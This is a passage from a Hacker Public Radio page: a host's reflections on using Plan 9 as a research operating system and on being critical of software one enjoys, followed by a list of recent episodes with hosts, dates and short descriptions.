Even now, after spending almost a month and a half worth of after work hacker hours almost exclusively on 9, I enjoy it more than when I began and even more than when using it in semi-regular spurts in years past. The purpose of research operating systems is to perform research, be it about the design of the system otherwise. Where would we be without private namespaces? How can I use this idea in the real world? What would the world look like if we had real distributed computing instead of web browsers (which are the new dumb terminal)? Is there a use case for this in the real world? What can we learn from single layer security models? What can we do to improve the system?

Plan 9 is perfect for this type of research. I'm considering writing an httpd in C and a werc-like (minus the parts I don't like) in C and modifying the namespace for the listener so that I can run a webserver on 9 without pulling in /bin in order to reduce the possibility of a shell escape.

I think that in order to improve ourselves, we must be critical of ourselves. We must be critical of the things we enjoy in order to improve them and learn something new in the process. For software especially, there is no such thing as perfection, only least bad. And my final thought:

Criticism: This program/OS/whatever sucks

Response: I know, help me fix it.


Previous five weeks

hpr3685 :: Budget and an Android app hosted by Archer72

2022-09-16. 00:02:02. Clean. general.
Zoho docs for budgeting

hpr3684 :: Wake on Lan hosted by JWP

2022-09-15. 00:10:02. Clean. general.
Wake on Lan mother board feature

hpr3683 :: Add a favourite to OSMAnd hosted by Ken Fallon

2022-09-14. 00:01:37. Clean. general.
Ken keeps forgetting how to add a favourite to OSMAnd

hpr3682 :: Hacker Public Radio 2021 - 2022 New Years Show Part 5 hosted by Honkeymagoo

2022-09-13. 03:06:01. Clean. general.
The HPR community comes together to chat

hpr3681 :: Rust 101 Episode 3: Functionally Insane hosted by BlacKernel

2022-09-12. 00:41:21. Clean. Programming 101.
In this episode BlacKernel teaches you how to make functions and for loops in rust

hpr3680 :: EDIT hosted by Ahuka

2022-09-09. 00:12:19. Clean. DOS.
More on DOS. This time it is EDIT

hpr3679 :: Linux Inlaws S01E64: Non-profits in the US: A closer look at 501(c)s hosted by monochromec

2022-09-08. 00:36:17. Clean. Linux Inlaws.
The Ins and Outs of 501(c)s

hpr3678 :: "Stupid Users" ... no, not those users, the other "stupid users" hosted by Lurking Prion

2022-09-07. 00:15:07. Clean. Privacy and Security.
.
Brady & I discuss stupid things done by those of us who really should know better.

hpr3677 :: Hacker Public Radio 2021 - 2022 New Years Show Part 4 hosted by Honkeymagoo

2022-09-06. 03:14:13. Clean. general.
.
The HPR community comes together to chat

hpr3676 :: HPR Community News for August 2022 hosted by HPR Volunteers

2022-09-05. 02:39:36. Clean. HPR Community News.
.
HPR Volunteers talk about shows released and comments posted in August 2022

hpr3675 :: Plan 9: An exercise in futility hosted by binrc

2022-09-02. 01:19:31. Clean. general.
.
I talk about the design of Plan 9 and how I use it

hpr3674 :: Emergency Show posted in 2012. MUD hosted by Klaatu

2022-09-01. 00:20:41. Clean. general.
.
In today's show klaatu drags us through the mud with his somewhat belated descovery.

hpr3673 :: Recording for Hacker Public Radio hosted by dnt

2022-08-31. 00:17:46. Clean. Podcasting HowTo.
.
My experiences recording episodes of HPR

hpr3672 :: Hacker Public Radio 2021 - 2022 New Years Show Part 3 hosted by Honkeymagoo

2022-08-30. 03:18:54. Clean. general.
.
The HPR community comes together to chat

hpr3671 :: Response to Episode 3655, "BSD for Linux Users" hosted by Claudio Miranda

2022-08-29. 00:11:14. Clean. general.
.
Claudio responds to binrc's episode on BSD for Linux Users and rambles on about other BSD stuff.

hpr3670 :: Changing Plans hosted by Ahuka

2022-08-26. 00:16:28. Clean. Travel.
.
We look at some potential Covid-19 issues and consider alternatives

hpr3669 :: My First Podcast: My Journey into the Computer World hosted by Hipernike

2022-08-25. 00:20:07. Clean. How I got into tech.
.
How I was introduced into computers, Linux, robotics, programming, cibersecurity and more...

hpr3668 :: Linux Inlaws S01E63: John Hawley on kernel dot org and other shenanigans hosted by monochromec

2022-08-24. 01:31:54. Clean. Linux Inlaws.
.
An interview with John Hawley of kernel.org fame

hpr3667 :: Hacker Public Radio 2021 - 2022 New Years Show Part 2 hosted by Honkeymagoo

2022-08-23. 03:07:48. Clean. general.
.
The HPR community comes together to chat

hpr3666 :: One Weird Trick hosted by Lurking Prion

2022-08-22. 00:16:37. Clean. Privacy and Security.
.
I talk about getting into or advancing in cybersecurity & how keyboards could trick malware.

hpr3665 :: UNIX Is Sublime hosted by binrc

2022-08-19. 00:59:46. Clean. general.
.
I talk about all of the reasons I love UNIX

hpr3664 :: Secret hat conversations hosted by Some Guy On The Internet

2022-08-18. 00:17:50. Clean. general.
.
You'll need your tin hat for this one.

hpr3663 :: How I got into Tech hosted by Stache_AF

2022-08-17. 00:05:58. Clean. How I got into tech.
.
Follow-up episode about how I got into tech

hpr3662 :: Hacker Public Radio 2021 - 2022 New Years Show Part 1 hosted by Honkeymagoo

2022-08-16. 03:05:38. Clean. general.
.
The HPR community comes together to chat

hpr3661 :: Ham Radio testing hosted by Archer72

2022-08-15. 00:06:01. Clean. HAM radio.
.
Study and testing for the ARRL Ham license

hpr3660 :: BASIC hosted by Ahuka

2022-08-12. 00:08:05. Clean. DOS.
.
We continue our technological archeology to explore the old warhorse, DOS. This time it is BASIC.

hpr3659 :: Developing an HPR static site generator hosted by Rho`n

2022-08-11. 00:11:13. Clean. general.
.
Rho`n describes his approach to developing a static site generator for HPR

hpr3658 :: Linux Inlaws S01E62: HPR's inner workings hosted by monochromec

2022-08-10. 00:32:55. Clean. Linux Inlaws.
.
An overview of HPRs inner workings and stats based on a ludicrous claim by the Inlaws

hpr3657 :: Small time sysadmin hosted by Some Guy On The Internet

2022-08-09. 00:26:08. Clean. general.
.
How I maintain my Linux Box, Part One.

hpr3656 :: Importance of Small toy projects hosted by norrist

2022-08-08. 00:19:09. Clean. general.
.
Toy projects are a great way to learn a new language, and a project I did just for fun.

Older Shows

Get a full list of all our shows.